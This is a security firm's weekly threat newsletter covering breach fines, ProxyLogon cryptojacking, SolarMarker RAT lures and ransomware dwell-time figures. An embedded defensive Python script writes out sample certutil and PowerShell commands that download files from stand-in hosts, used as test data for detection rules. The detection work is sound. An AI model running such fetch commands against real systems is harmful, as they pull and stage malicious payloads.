
Neu Cyber Threats – 22nd April 2021


Welcome to the latest edition of Neu Cyber Threats, a weekly series in which we here at Neuways bring attention to the latest cybersecurity threats in order to ensure you stay safe online.

Here are the most prominent threats which you should be aware of:

 


£42m in Data Breach Fines Issued to Businesses in 2020


The Information Commissioner’s Office (ICO) hit UK businesses with £42m in data breach fines last year. Fines were given out as a result of breaches of the Privacy and Electronic Communications Regulations (PECR) and the Data Protection Act (DPA).

The largest fine was handed to British Airways with just over half of the £42.41m total being paid by the airline, following a 2018 cyber attack which saw over half a million of its customers’ details stolen by cyber criminals.

The news highlights the need for businesses to improve their data management policies and secure the data they hold correctly. With the COVID-19 pandemic, many companies might have prioritised other areas of their business, forgetting about improvements to their cyber security measures. Read more on the story and what to be aware of, here.


Attackers Target ProxyLogon Exploit to Install Cryptojacker


Microsoft Exchange servers have again been targeted, this time by cyber criminals looking to host a malicious Monero cryptominer in an “unusual attack”. This latest hit to the Exchange servers follows the recent infamous ProxyLogon exploit.

It has been discovered that the threat actors were able to use the exploit to compromise the Exchange servers, which have suffered a whole range of attacks from advanced persistent threat (APT) groups infecting systems with everything from ransomware to webshells, in order to host Monero cryptomining malware.

The attack began with a PowerShell command to retrieve a file named win_r.zip from another compromised server’s Outlook Web Access logon path. On closer inspection, the .zip file was not a compressed archive at all but a batch script, which then invoked the certutil.exe program built into Windows to download two additional files, win_s.zip and win_d.zip, which were not compressed archives either.
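A defender-side triage check for the delivery stage described above, added here as an example and not taken from the researchers' report: it flags PowerShell or certutil.exe command lines that fetch from a URL, and tests whether a file named .zip really starts with a ZIP signature. The event format, rule names, host names and the `/owa/auth/` path prefix are assumptions, and all sample data is constructed.

```python
import ntpath
import re
from urllib.parse import urlsplit

# Signatures that open a real ZIP: local file header, empty archive, spanned archive.
ZIP_MAGICS = (b"PK\x03\x04", b"PK\x05\x06", b"PK\x07\x08")
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def classify_zip_named_file(name, data):
    """Compare a file's .zip name with its leading bytes."""
    if not name.lower().endswith(".zip"):
        return "not-applicable"
    if data.startswith(ZIP_MAGICS):
        return "zip"
    if data.startswith(b"MZ"):
        return "mismatch:pe"      # Windows executable carrying a .zip name
    head = data[:512]
    if head and all(b in (9, 10, 13) or 32 <= b < 127 for b in head):
        return "mismatch:text"    # plain text, e.g. a batch script as in the report
    return "mismatch:other"


def flag_process_event(event):
    """Return the (hypothetical) rule names a process-creation event trips."""
    image = ntpath.basename(event["image"]).lower()
    urls = URL_RE.findall(event["cmdline"])
    hits = []
    # certutil is a certificate tool; a URL on its command line is rarely routine.
    if image == "certutil.exe" and urls:
        hits.append("certutil-network-fetch")
    # PowerShell pulling an "archive" from a host's OWA logon directory
    # (path prefix is an assumption about where that logon path lives).
    if image in ("powershell.exe", "pwsh.exe"):
        for url in urls:
            path = urlsplit(url).path.lower()
            if path.startswith("/owa/auth/") and path.endswith(".zip"):
                hits.append("powershell-fetch-from-owa-path")
                break
    return hits


# Constructed sample data, not taken from the incident; hosts use .invalid names.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -Command Invoke-WebRequest -Uri "
                r"http://mail.example.invalid/owa/auth/win_r.zip "
                r"-OutFile C:\Windows\Temp\win_r.zip"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f "
                r"http://mail.example.invalid/owa/auth/win_s.zip C:\Windows\Temp\win_s.zip"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -hashfile C:\Temp\report.pdf SHA256"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

SAMPLE_FILES = [
    ("win_r.zip", b"@echo off\r\nrem constructed placeholder\r\n"),
    ("forms.zip", b"PK\x03\x04" + bytes(26)),
    ("tool.zip", b"MZ\x90\x00" + bytes(60)),
    ("blob.zip", bytes(16)),
]


def triage(events, files):
    """Run both checks and keep only the findings worth an analyst's time."""
    flagged_events = [
        (index, hits)
        for index, hits in enumerate(flag_process_event(e) for e in events)
        if hits
    ]
    flagged_files = {
        name: verdict
        for name, verdict in ((n, classify_zip_named_file(n, d)) for n, d in files)
        if verdict.startswith("mismatch")
    }
    return {"events": flagged_events, "files": flagged_files}


if __name__ == "__main__":
    report = triage(SAMPLE_EVENTS, SAMPLE_FILES)
    for index, hits in report["events"]:
        print(f"event {index}: {', '.join(hits)}")
    for name, verdict in report["files"].items():
        print(f"file {name}: {verdict}")
```

The benign certutil hash check and the scheduled PowerShell script in the sample set pass through unflagged, which is the behaviour to preserve when tuning rules like these against real telemetry.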

A script runs the executable, which extracts the miner and configuration data from the QuickCPU.dat file and injects it into a system process, before deleting any evidence that it was there. The attack’s executable appears to contain a modified version of a publicly available tool called PEx64-Injector, which is described as having the ability to migrate files without requiring any administrator privileges. Once the file runs on an infected system, it temporarily extracts the contents of the QuickCPU.dat file, which includes an installer for the cryptominer and its configuration, to the file system. It configures the miner, injects it into a running process, then exits, leaving the miner running on the system with the damage done.

Researchers observed the cryptominer receiving funds on 9th March 2021, which incidentally is also when Microsoft released updates to Exchange to patch the flaws. Although the attacker lost several servers after this date and the overall activity from the miner decreased, other servers that were gained more than made up for the early losses. The ProxyLogon problem started for Microsoft in early March, when the company said it had spotted multiple zero-day exploits being used to attack on-premises versions of Microsoft Exchange Server. The four flaws created a pre-authentication remote code execution (RCE) exploit, meaning attackers can take over servers without knowing any valid account credentials, giving them access to email communications and the ability to install a web shell for further exploitation within the environment.

While Microsoft has already released an out-of-band update, with the company confirming that 92% of affected machines had been patched, much damage has already been done to businesses whose Exchange servers were affected by the issue, and there will still be unpatched systems out there that remain vulnerable.


100,000 Google Sites Used to Install SolarMarker RAT


Cyber criminals are using search-engine optimisation (SEO) tactics to direct users searching for common business forms such as invoices, receipts or other templates to hacker-controlled Google-hosted domains.

Business users are being lured to over 100,000 malicious Google sites that appear legitimate, but instead install a remote access trojan (RAT), used to gain a foothold on a network and later infect systems with ransomware, credential-stealers, banking trojans and other malware.

Hundreds of thousands of unique, malicious web pages that contain popular business terms and keywords, including business-form related keywords like template, invoice, receipt, questionnaire and resume, were found over the last week.

Cyber criminals use Google search re-direction and drive-by-download tactics to direct unsuspecting victims to the RAT. Typically, a person who visits the infected site simply executes a binary disguised as a PDF by clicking on a purported “form”, thus infecting his or her machine. This is an increasingly common trend with malware delivery, which speaks to the improved security of applications such as browsers that handle vulnerable code. Unfortunately, it reveals a glaring blind spot in controls, which allows users to execute untrusted binaries or script files at will.

The campaign is not only huge and far-reaching but sophisticated too. The common business terms serving as keywords for the threat actors’ search-optimisation strategy are convincing Google’s web crawler that the intended content meets conditions for a high page-rank score, which means the malicious sites will appear at the top of user searches, increasing the likelihood that victims will be lured to infected sites. Security heads and managers need to know that the threat group has gone to a lot of effort to compromise business professionals, spreading a wide net and using many tactics to successfully disguise their traps.

In one recent incident observed by researchers, a victim working in the financial industry was searching for a free version of a document online and was re-directed via Google Search to a Google Sites page that was under the control of threat actors and included an embedded download button. It’s clear that the cyber criminals are targeting the right people, as someone working in the financial industry would be a “high-value target” of the campaign.

Once a RAT has been successfully installed on a victim’s computer, the hackers can upload additional malware to the device, such as a banking trojan, which could be used to hijack the online banking credentials of the business. Threat actors could also install a credential-stealer to harvest the employee’s email credentials and launch a business email compromise (BEC) scheme.

Neuways advises employees to consider what type of business forms, invoices, receipts, etc. they search for online. By keeping these forms on a centralised system such as Microsoft SharePoint, colleagues can share documents such as these and avoid falling into sophisticated traps laid by cyber criminals. Our Phishing Awareness Training is top-of-the-class and makes businesses safer through the education of their employees. Contact us on 01283 753333 or hello@neuways.com to discuss your options with us.


Breaches Detected Faster, But Ransomware Surge a Major Factor: FireEye


Recent data shows that the time it takes businesses to detect a malicious attack continues to drop, mostly because companies are becoming better at detecting cyber attacks.

The data shows that organisations are getting better at detecting intrusions on their own, but the massive increase in ransomware attacks was another factor. Ransomware attacks are typically detected quickly because the attackers often make their presence known when they demand a ransom, after they have encrypted the victim’s files and/or stolen the victim’s data.

In the ransomware attacks investigated by researchers, 78% had a dwell time of 30 days or less, and only 1% of these incidents had a dwell time of 700 days or more. As previously mentioned, this could be due to the ease with which ransomware attacks can be operated. Rather than placing all of their eggs in one basket (or one cyber attack), cyber criminals can instead attack thousands of businesses all at once.

59% of the breaches investigated globally during this period were detected internally, compared with 47% in 2019. The number of days an attacker is present in the target’s environment before they are discovered – the ‘dwell time’ – also decreased significantly in 2020 compared to the previous year, from 56 days to 24 days. In the case of external breach notifications, the median dwell time in 2020 was 73 days, while in the case of internal detection the dwell time was only 12 days.

Interestingly, the median global dwell time was just 5 days for ransomware investigations and 45 days for non-ransomware investigations. Overall, the global median dwell time has decreased steadily over the past decade, from 416 days in 2011 to 24 in 2020.

The data also notes new extortion techniques used by ransomware gangs; the widespread phishing and extortion campaigns conducted by a cybercrime group named FIN11; the threat group behind the SolarWinds supply chain attack; and malicious actors shifting focus to systems that support remote work.

In terms of attack tactics, it was found that attackers used 63% of ‘MITRE ATT&CK’ techniques and 24% of sub-techniques throughout the analysed time frame. However, the researchers said, just 37% of the techniques observed (23% of all techniques) were seen in more than 5% of the intrusions they investigated.

Neuways advises businesses to be constantly aware of the threat of phishing campaigns, ransomware and cyber criminals. The rise of ransomware is often attributed to the amount of chaos and disruption that businesses have gone through over the last 12 months, between an increase in remote working and national lockdowns. As the UK emerges from lockdown, businesses must prepare themselves for a continuation of ransomware-filled phishing campaigns. Employees should remain vigilant when answering emails or phone calls, so that they do not fall victim to cyber criminals aiming to extort them for their company’s money.


If you are concerned about any cyber security issues within your business, contact us today on 01283 753 333 or email hello@neuways.com.
